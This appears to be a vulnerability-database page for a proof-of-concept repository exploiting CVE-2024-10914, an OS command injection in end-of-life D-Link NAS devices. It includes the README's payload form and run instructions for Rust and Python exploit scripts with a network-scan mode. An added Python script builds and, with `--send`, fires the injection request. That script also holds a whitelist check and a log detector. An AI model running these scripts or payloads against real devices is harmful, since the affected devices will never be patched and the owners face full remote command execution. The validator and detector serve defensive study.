Associated vulnerability
Title:
D-Link multiple products security vulnerability
(CVE-2024-10914)
Description: The D-Link DNS-320 and related models are NAS (network-attached storage) devices from D-Link (友讯). Multiple D-Link products contain a security vulnerability: improper handling of the `name` parameter leads to OS command injection. The following products and versions are affected: D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L, version 20241028 and earlier.
Description
D-Link vulnerability (CVE-2024-10914) exploit ported to Python and Rust
Introduction
# CVE-2024-10914 ported to rust and python
because why not
## what is this
CVE-2024-10914 is a recently disclosed OS command injection vulnerability (CVSS 9.8, critical) that affects several end-of-life D-Link NAS devices. Because those devices are past their support period, D-Link has said it will not patch them and recommends replacing the hardware, which amounts to "stop being poor and just buy a new device".
## how does this work
The vulnerable devices expose an HTTP endpoint at `/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=<user_input>`. The `name` value is passed into a shell command without being sanitized: instead of restricting it to a strict whitelist (for example alphanumeric characters only), the CGI accepts any character, including the metacharacters the shell uses to chain commands, so arbitrary OS commands end up being executed on the device.
By placing shell metacharacters (such as `;`, `|`, `&` or `$(command)`) in the `name` field, anyone who can reach the web interface can run shell commands. For example:
`...name=admin'; echo 'get pwned bozo'; #`
All either script does is send one request with the `name` parameter set to whatever command you want to run.
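The request above, the whitelist check the CGI should have applied, and a log-side detector for the same injection, written out as an added example. This is not code from the repository or from verylazytech's original; the placeholder host `192.0.2.10`, the username whitelist, and the access-log lines are all constructed for illustration.

```python
"""Added example (not the repo's code): build the CVE-2024-10914 request,
apply the whitelist the firmware lacked, and flag the injection in logs.
The target host and the log lines below are constructed placeholders."""
import re
import sys
import urllib.parse
import urllib.request

ENDPOINT = "/cgi-bin/account_mgr.cgi"

# Assumed whitelist for a NAS username (illustrative, not D-Link's rule).
# Applied server-side it would reject every payload this script builds.
NAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def build_payload(command: str) -> str:
    """Name value in the README's form: close the quote, inject, comment out the rest."""
    return f"admin'; {command}; #"


def build_url(base: str, command: str) -> str:
    """Full GET URL. urlencode() percent-encodes ';', '#' and spaces so they
    reach the CGI intact instead of being dropped by the HTTP layer."""
    query = urllib.parse.urlencode({"cmd": "cgi_user_add", "name": build_payload(command)})
    return base.rstrip("/") + ENDPOINT + "?" + query


def send(url: str, timeout: float = 5.0) -> str:
    """Fire the request (only against a device you own). Returns the body."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def validate_name(name: str) -> bool:
    """The missing check: a whitelist, not a blacklist of metacharacters."""
    return NAME_RE.fullmatch(name) is not None


# Apache/lighttpd-style access line: capture client IP and request target.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/')


def suspicious_requests(lines):
    """Return (ip, decoded name) for account_mgr.cgi hits whose decoded
    name= fails the whitelist. Decoding first means %3B, '+' and a raw ';'
    all land on the same rule."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urllib.parse.urlsplit(target)
        if not parts.path.endswith(ENDPOINT):
            continue
        params = urllib.parse.parse_qs(parts.query, keep_blank_values=True)
        for name in params.get("name", []):
            if not validate_name(name):
                hits.append((ip, name))
    return hits


# Constructed sample log lines; the 10.0.0.9 request carries the injection.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Nov/2024:10:12:01 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [08/Nov/2024:10:12:07 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=admin%27%3B+id%3B+%23 HTTP/1.1" 200 88',
    '10.0.0.9 - - [08/Nov/2024:10:12:09 +0000] "GET /index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    args = [a for a in sys.argv[1:] if not a.startswith("--")]
    base = args[0] if args else "http://192.0.2.10"  # placeholder host
    command = args[1] if len(args) > 1 else "id"
    url = build_url(base, command)
    print("request:", url)
    print("payload passes whitelist?", validate_name(build_payload(command)))
    print("flagged in sample log:", suspicious_requests(SAMPLE_LOG))
    if "--send" in sys.argv:  # nothing leaves the machine unless asked
        print(send(url))
```

Run it with no arguments to see the encoded request and the detector's output without touching the network; add a base URL and `--send` to actually fire it at a device you own. The detector deliberately decodes the query before matching, so an attacker who percent-encodes or `+`-encodes the metacharacters is caught by the same whitelist rule as one who sends them raw.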
There's a good video by Fireship that explains it in more detail: https://www.youtube.com/watch?v=52v6gKPA4TM
## how to use
First you need a vulnerable device. Affected models include:
- DNS-320 (Version 1.00)
- DNS-320LW (Version 1.01.0914.2012)
- DNS-325 (Versions 1.01, 1.02)
- DNS-340L (Version 1.08)
I strongly advise against using these scripts against someone else's device without their consent; only do this if you own the device or have the owner's permission.
### rust
- if you already know the device's IP address:
> `cargo run -- -u http://<device ip address>`
- if you want to perform a quick network scan:
> `cargo run`
### python
- first install the dependencies:
> `pip install -r requirements.txt`
- if you already know the device's IP address:
> `python main.py -u http://<device ip address>`
- if you want to perform a quick network scan:
> `python main.py`
then follow the on-screen instructions
## credits
I did not come up with the original code, [verylazytech](https://github.com/verylazytech/) did. I only ported it to Rust and Python because why the fuck not. Of course all credit goes to him and anyone else involved in the discovery of this exploit.
https://github.com/verylazytech/CVE-2024-10914/
File snapshot
[4.0K] /data/pocs/961638098286e8443636c0933b5e781bed140274
├── [ 47K] Cargo.lock
├── [ 246] Cargo.toml
├── [4.0K] main.py
├── [2.2K] README.md
├── [ 8] requirements.txt
└── [4.0K] src
└── [5.4K] main.rs
1 directory, 6 files
Notes
1. Accessing the POC through the original source is recommended.
2. If the source is no longer available or cannot be accessed, email f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.